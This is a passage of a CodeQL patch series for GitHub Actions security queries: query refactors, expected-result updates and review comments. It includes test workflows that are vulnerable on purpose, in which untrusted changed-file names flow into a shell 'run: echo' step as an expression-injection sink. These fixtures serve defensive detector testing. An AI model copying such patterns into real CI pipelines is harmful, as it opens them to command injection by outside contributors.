@@ -220,7 +220,7 @@ subpaths | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... 
age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected index 174f9d49e87..c26769a692e 100644 --- a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -1 +1 @@ -| .github/workflows/missing_perms.yml:6:5:9:32 | name: Build and test | Actions Job or Workflow does not set permissions | +| .github/workflows/missing_perms.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 169d9c9ac2b..6620d2ac385 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,7 +1,7 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | uses: foo/bar@v1 | -| .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... 
n-pr@v1 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Uses Step | +| .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Unpinned 3rd 
party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 76d47eec191..7527a1e15f2 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1 +1 @@ -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | uses: a ... kout@v2 | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | +| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | From 6875640c6439aa6c4faa17f20af2ac43262cacfe Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Mar 2024 10:33:26 +0100 Subject: [PATCH 0084/1267] Refactor getXXXExpr methods --- ql/lib/codeql/actions/Ast.qll | 54 +++++++++-------- .../actions/controlflow/internal/Cfg.qll | 2 +- .../{inter-job.yml => inter-job0.yml} | 9 ++- .../CWE-094/.github/workflows/inter-job1.yml | 43 +++++++++++++ .../CWE-094/.github/workflows/inter-job2.yml | 45 ++++++++++++++ .../CWE-094/.github/workflows/inter-job4.yml | 44 ++++++++++++++ .../CWE-094/.github/workflows/inter-job5.yml | 45 ++++++++++++++ .../CriticalExpressionInjection.expected | 55 +++++++++++++---- .../CWE-094/ExpressionInjection.expected | 60 +++++++++++++++---- 9 files changed, 307 insertions(+), 50 deletions(-) rename ql/test/query-tests/Security/CWE-094/.github/workflows/{inter-job.yml => inter-job0.yml} (85%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 096f3b9f803..89afd954d85 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -214,19 +214,20 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getMatrixVariable(string name) { + StringLiteral getMatrixVar(string name) { super.lookup("matrix").(YamlMapping).lookup(name) = result } - string getAMatrixVariableName() { - this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) - } + /** + * Gets a specific matric expression (YamlMapping) by name. + */ + StringLiteral getAMatrixVar() { super.lookup("matrix").(YamlMapping).lookup(_) = result } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends AstNode { +class Needs extends AstNode instanceof YamlMappingLikeNode { Job job; Needs() { job.(YamlMapping).lookup("needs") = this } @@ -234,16 +235,18 @@ class Needs extends AstNode { Job getJob() { result = job } Job getANeededJob() { - if this instanceof YamlString - then - result.getId() = this.(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - else - if this instanceof YamlSequence - then - result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - else none() + result.getId() = super.getNode(_).(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + // if this instanceof YamlString + // then + // result.getId() = this.(YamlString).getValue() and + // result.getLocation().getFile() = job.getLocation().getFile() + // else + // if this instanceof YamlSequence + // then + // result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + // result.getLocation().getFile() = job.getLocation().getFile() + // else none() } } 
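Review bot: The doc comment on the new `getAMatrixVar()` is a copy of the one on `getMatrixVar(string name)` and does not describe it. The predicate takes no name and, per its body `super.lookup("matrix").(YamlMapping).lookup(_) = result`, yields every value under `matrix`. I would document it as `/** Gets the value of any variable defined under this strategy's matrix mapping. */` and fix the "matric" typo in the comment kept on `getMatrixVar`. The hunk also removes `getAMatrixVariableName()` without a replacement, so it is worth confirming that nothing outside this patch still calls it. The `Strategy` class starts outside the hunk.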
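Review bot: The previous if/else implementation of `getANeededJob()` is left as a commented-out block directly under the new two-line body; it should be deleted, since the history already keeps it. A short why-comment would serve better, for example `// getNode(_) covers both the scalar form (needs: job1) and the sequence form (needs: [job0, job1])`, assuming that is how `YamlMappingLikeNode.getNode` treats scalars. The fixtures added in this patch exercise only the sequence forms as far as the visible hunks show, so the scalar case is worth confirming with a test. The `Needs` class starts outside the hunk.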
@@ -583,29 +586,30 @@ class StepsExpression extends ContextExpression { * e.g. `${{ needs.job1.outputs.foo}}` */ class NeedsExpression extends ContextExpression { - Job job; - string jobId; + Job neededJob; + string neededJobId; string fieldName; NeedsExpression() { expr.regexpMatch(needsCtxRegex()) and - jobId = expr.regexpCapture(needsCtxRegex(), 1) and + neededJobId = expr.regexpCapture(needsCtxRegex(), 1) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and - job.getId() = jobId + neededJob.getId() = neededJobId } - predicate usesReusableWorkflow() { job.usesReusableWorkflow() } + predicate usesReusableWorkflow() { neededJob.usesReusableWorkflow() } override string getFieldName() { result = fieldName } override AstNode getTarget() { - job.getLocation().getFile() = this.getLocation().getFile() and + neededJob.getLocation().getFile() = this.getLocation().getFile() and + this.getJob().getANeededJob() = neededJob and ( // regular jobs - job.getOutputs() = result + neededJob.getOutputs() = result or // reusable workflow calling jobs - job.getUses() = result + neededJob.getUses() = result ) } } @@ -701,12 +705,12 @@ class MatrixExpression extends ContextExpression { override AstNode getTarget() { exists(Workflow w | - w.getStrategy().getMatrixVariable(fieldName) = result and + w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this ) or exists(Job j | - j.getStrategy().getMatrixVariable(fieldName) = result and + j.getStrategy().getMatrixVar(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index d64c91f7bb7..6015e6336ca 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
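Review bot: `usesReusableWorkflow()` still ranges over a `neededJob` that the characteristic predicate binds by id alone (`neededJob.getId() = neededJobId`). The same-file check and the new `this.getJob().getANeededJob() = neededJob` check are applied only inside `getTarget()`. A job with the same id in another workflow file, or one the enclosing job does not list under `needs`, can therefore still satisfy `usesReusableWorkflow()`, so the two predicates can disagree about which job the expression refers to. Moving both constraints into the characteristic predicate, `neededJob.getLocation().getFile() = this.getLocation().getFile() and this.getJob().getANeededJob() = neededJob`, would keep them consistent, provided that does not introduce a recursion problem with `getJob()`.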
@@ -215,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getMatrixVariable(_) and l = child.getLocation() + child = super.getAMatrixVar() and l = child.getLocation() | child order by diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml similarity index 85% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 2760a6c3d35..5ad00b17db9 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -1,6 +1,13 @@ -on: push +jn: push jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + job1: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml new file mode 100644 index 00000000000..4f149a92041 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml 
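Review bot: The first line of inter-job0.yml changes the trigger key from `on: push` to `jn: push`, which looks like a stray keystroke rather than an intended edit. The same `jn: push` appears in the new inter-job4.yml and inter-job5.yml, while inter-job1.yml and inter-job2.yml use `on: push`. Without an `on:` key these fixtures are not valid workflows, and any query that takes the triggering event into account would stop matching them without a visible failure. Restore `on: push` in all three files. It matters most in inter-job5.yml, which is the only negative case for the new `needs` check.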
@@ -0,0 +1,43 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: [job0, job1] + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml new file mode 100644 index 00000000000..21fa789d9e7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml @@ -0,0 +1,45 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job0 + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml new file mode 100644 index 00000000000..aad2d171c1a --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -0,0 +1,44 @@ +jn: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml new file mode 100644 index 00000000000..d6b7b2b1b0c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml @@ -0,0 +1,45 @@ +jn: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job0 + + steps: + - id: sink + # Should not be reported since job1 is not needed + run: echo ${{needs.job1.outputs.job_output}} 
diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index dacd31cf91c..9d00212e3af 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
@@ -15,11 +15,26 @@ edges | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... 
iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | +| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... 
iles }} | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | 
@@ -75,12 +90,30 @@ nodes | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... 
alue }} | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... 
itle }} | | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index b21ac80574b..1ea054565bc 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -15,11 +15,26 @@ edges | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:15:7:17:4 